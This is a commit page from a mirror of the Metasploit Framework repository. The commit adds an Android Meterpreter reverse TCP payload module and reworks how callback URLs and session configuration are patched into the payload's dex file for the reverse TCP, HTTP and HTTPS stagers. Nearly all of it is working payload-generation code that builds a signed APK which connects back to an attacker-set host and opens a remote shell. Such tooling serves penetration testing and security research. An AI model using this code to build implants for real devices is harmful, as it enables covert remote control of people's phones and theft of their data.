infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

android meterpreter_reverse_tcp

bug/bundler_fix
Tim 2016-09-08 17:31:38 +01:00
parent 9f3c8c7eee
commit 32c2311b86
5 changed files with 107 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
lib/msf/core/payload/dalvik.rb
View File

@ -1,8 +1,13 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/uuid/options'
require 'msf/core/payload/transport_config'
module Msf::Payload::Dalvik
include Msf::Payload::TransportConfig
include Msf::Payload::UUID::Options
#
# Fix the dex header checksum and signature
# http://source.android.com/tech/dalvik/dex-format.html
@ -31,14 +36,36 @@ module Msf::Payload::Dalvik
[str.length].pack("N") + str
end
def apply_options(classes)
def apply_options(classes, opts, url)
timeouts = [
datastore['SessionExpirationTimeout'].to_s,
datastore['SessionCommunicationTimeout'].to_s,
datastore['SessionRetryTotal'].to_s,
datastore['SessionRetryWait'].to_s
].join('-')
string_sub(classes, 'TTTT ', 'TTTT' + timeouts)
if opts[:stageless]
config = generate_config_hex(opts)
string_sub(classes, 'UUUU' + ' ' * 8191, 'UUUU' + config)
end
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
string_sub(classes, 'TTTT' + ' ' * 48, 'TTTT' + timeouts)
end
def generate_config_hex(opts={})
opts[:uuid] ||= generate_payload_uuid
# create the configuration block, which for staged connections is really simple.
config_opts = {
ascii_str: true,
arch: opts[:uuid].arch,
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config(opts)]
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
config.to_b.unpack('H*').first
end
def string_sub(data, placeholder="", input="")

66
modules/payloads/singles/android/meterpreter_reverse_tcp.rb Normal file
View File

@ -0,0 +1,66 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/dalvik'
require 'msf/core/payload/transport_config'
require 'msf/base/sessions/meterpreter_android'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::TransportConfig
include Msf::Payload::Single
include Msf::Payload::Dalvik
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Android Meterpreter Shell, Reverse TCP Inline',
'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
'Platform' => 'android',
'Arch' => ARCH_DALVIK,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_Java_Android,
'Payload' => '',
))
register_options([
OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
], self.class)
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
def generate_jar(opts={})
jar = Rex::Zip::Jar.new
classes = MetasploitPayloads.read('android', 'meterpreter.dex')
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
opts[:stageless] = true
apply_options(classes, opts, url)
jar.add_file("classes.dex", fix_dex_header(classes))
files = [
[ "AndroidManifest.xml" ],
[ "resources.arsc" ]
]
jar.add_files(files, MetasploitPayloads.path("android", "apk"))
jar.build_manifest
cert, key = generate_cert
jar.sign(key, cert, [cert])
jar
end
end

4
modules/payloads/stagers/android/reverse_http.rb
View File

@ -41,8 +41,7 @@ module MetasploitModule
url << generate_uri_uuid_mode(:init_java, uri_req_len)
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
apply_options(classes)
apply_options(classes, opts, url)
jar = Rex::Zip::Jar.new
jar.add_file("classes.dex", fix_dex_header(classes))
@ -59,4 +58,5 @@ module MetasploitModule
jar
end
end

3
modules/payloads/stagers/android/reverse_https.rb
View File

@ -41,7 +41,6 @@ module MetasploitModule
url << generate_uri_uuid_mode(:init_java, uri_req_len)
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
datastore['HandlerSSLCert'])
@ -50,7 +49,7 @@ module MetasploitModule
string_sub(classes, 'WWWW ', hash)
end
apply_options(classes)
apply_options(classes, opts, url)
jar = Rex::Zip::Jar.new
jar.add_file("classes.dex", fix_dex_header(classes))

15
modules/payloads/stagers/android/reverse_tcp.rb
View File

@ -6,6 +6,7 @@
require 'metasploit-payloads'
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/transport_config'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
@ -14,7 +15,9 @@ module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Stager
include Msf::Payload::TransportConfig
include Msf::Payload::Dalvik
include Msf::Payload::UUID::Options
def initialize(info = {})
super(merge_info(info,
@ -29,18 +32,18 @@ module MetasploitModule
))
end
def include_send_uuid
false
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
def generate_jar(opts={})
jar = Rex::Zip::Jar.new
classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
apply_options(classes)
apply_options(classes, opts, payload_uri)
jar.add_file("classes.dex", fix_dex_header(classes))